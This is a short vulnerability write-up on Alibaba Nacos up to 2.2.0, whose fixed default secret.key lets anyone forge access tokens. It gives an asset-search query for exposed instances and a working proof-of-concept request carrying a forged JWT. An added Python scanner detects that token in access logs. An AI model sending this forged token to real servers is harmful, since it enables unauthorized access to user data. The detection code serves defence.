Alibaba Nacos Secret Key Default Key Unauthorized Access Vulnerability

Vulnerability Description

Alibaba Nacos ships with a fixed default secret.key. Because the key is the same on every installation that keeps the default, an attacker can construct requests that the server accepts and obtain sensitive information, resulting in unauthorized access.

Vulnerability Impact

Alibaba Nacos <= 2.2.0

Network Asset Search Query

app="NACOS"

Vulnerability Reproduction

[Image: login page]

The vulnerability is caused by the use of a fixed key.

Verify POC

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
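
As an added example (not part of the original post), the following Python code shows how a defender could search access logs for this issue: it flags requests carrying the exact token published in the PoC above, and accessToken requests the server accepted from clients with no earlier login in the log. The combined-style log format, the login path /nacos/v1/auth/users/login, the names used and the sample lines are assumptions constructed for illustration.

```python
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

# Token from the PoC request above; a verbatim replay sends exactly this value.
POC_TOKEN = ("eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30"
             ".feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ")
# Assumptions: combined-style access log lines; console login is a POST to LOGIN_PATH.
LINE_RE = re.compile(r'^(\S+) .*?"(\S+) (\S+) HTTP/[\d.]+" (\d{3})')
LOGIN_PATH = "/nacos/v1/auth/users/login"

def jwt_sub(token):
    """Subject claim of a JWT, decoded without verifying it; None if malformed."""
    try:
        body = token.split(".")[1]
        claims = json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))
        return claims.get("sub")
    except (IndexError, ValueError, AttributeError):
        return None

def scan(lines):
    """Return (client, token subject, reason) for each suspicious accessToken request."""
    logged_in, findings = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m.group(3).startswith("/nacos/"):
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        token = parse_qs(url.query).get("accessToken", [None])[0]
        if method == "POST" and url.path == LOGIN_PATH and status == "200":
            logged_in.add(client)  # tokens from this client are explained by a login
        elif token == POC_TOKEN:
            findings.append((client, jwt_sub(token), "published PoC token"))
        elif token and status == "200" and client not in logged_in:
            findings.append((client, jwt_sub(token), "token accepted without prior login"))
    return findings

# Constructed sample log: a normal console session, a PoC replay, an unexplained token.
OPS = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvcHMiLCJleHAiOjE3MDAwMDAwMDB9.constructed"
USERS = "/nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken="
SAMPLE_LOG = [
    f'192.0.2.10 - - [02/Nov/2023:09:58:01 +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 181',
    f'192.0.2.10 - - [02/Nov/2023:09:58:03 +0000] "GET {USERS}{OPS} HTTP/1.1" 200 512',
    f'198.51.100.7 - - [02/Nov/2023:10:14:40 +0000] "GET {USERS}{POC_TOKEN} HTTP/1.1" 403 90',
    f'203.0.113.9 - - [02/Nov/2023:10:20:12 +0000] "GET {USERS}{OPS} HTTP/1.1" 200 512',
]
```

Per-client login tracking is unreliable behind NAT or a reverse proxy and across log rotation, so treat the second kind of finding as a lead to review rather than proof.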

This post is licensed under CC BY 4.0 by the author.